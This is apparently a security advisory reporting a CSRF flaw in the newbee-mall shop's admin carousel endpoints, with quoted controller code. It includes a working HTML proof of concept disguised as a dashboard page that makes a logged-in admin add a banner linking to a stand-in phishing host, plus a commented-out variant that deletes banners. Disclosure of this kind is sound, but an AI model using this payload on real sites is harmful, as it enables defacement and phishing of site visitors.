CSRF Vulnerability in Admin Carousel Management

[flashzyc]

CSRF Vulnerability in Admin Carousel Management

Summary

A CSRF vulnerability exists in the admin carousel (banner) management endpoints. Attackers can modify, delete, or add carousel images on the mall homepage, potentially displaying malicious content or phishing links to all site visitors.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    public void addInterceptors(InterceptorRegistry registry) {
        registry.addInterceptor(adminLoginInterceptor)
                .addPathPatterns("/admin/**");
        // ❌ No CSRF protection for admin operations
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/admin/NewBeeMallCarouselController.java

The controller contains multiple vulnerable endpoints:

// Add carousel
@PostMapping("/carousels/save")
@ResponseBody
public Result save(@RequestBody Carousel carousel) {
    // ❌ No CSRF token validation
    // ⚠️ Can add malicious banners with phishing links
}

// Update carousel
@PutMapping("/carousels/update")
@ResponseBody
public Result update(@RequestBody Carousel carousel) {
    // ❌ No CSRF token validation
    // ⚠️ Can modify existing banners
}

// Delete carousel
@DeleteMapping("/carousels/delete")
@ResponseBody
public Result delete(@RequestBody Integer[] ids) {
    // ❌ No CSRF token validation
    // ⚠️ Can remove all homepage banners
}

Security Issues:

1. ❌ No CSRF token validation on any carousel operations
2. ⚠️ Can inject malicious image URLs
3. ⚠️ Can add phishing links to redirect URL
4. ⚠️ Affects all site visitors

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Admin Dashboard Update</title>
</head>
<body>
    <h2>📊 Updating dashboard metrics...</h2>
    <p>Please wait...</p>
    
    <script>
        // Add malicious carousel with phishing link
        fetch('http://localhost:28089/admin/carousels/save', {
            method: 'POST',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify({
                carouselUrl: 'https://evil-phishing-site.com/fake-login',
                redirectUrl: 'https://evil-phishing-site.com/steal-credentials',
                carouselRank: 1,  // Display first
                isDeleted: 0
            })
        })
        .then(response => response.json())
        .then(data => {
            document.body.innerHTML = '<h3>✅ Dashboard updated!</h3>';
        });
        
        // Alternative: Delete all existing carousels
        /*
        fetch('http://localhost:28089/admin/carousels/delete', {
            method: 'DELETE',
            credentials: 'include',
            headers: {
                'Content-Type': 'application/json'
            },
            body: JSON.stringify([1, 2, 3, 4, 5])  // Delete IDs 1-5
        });
        */
    </script>
</body>
</html>

Impact

Homepage defacement and mass phishing attack - Attackers can display malicious banners to all site visitors, leading to widespread phishing attacks and brand reputation damage.

---

CVSS Score: 7.8 (High)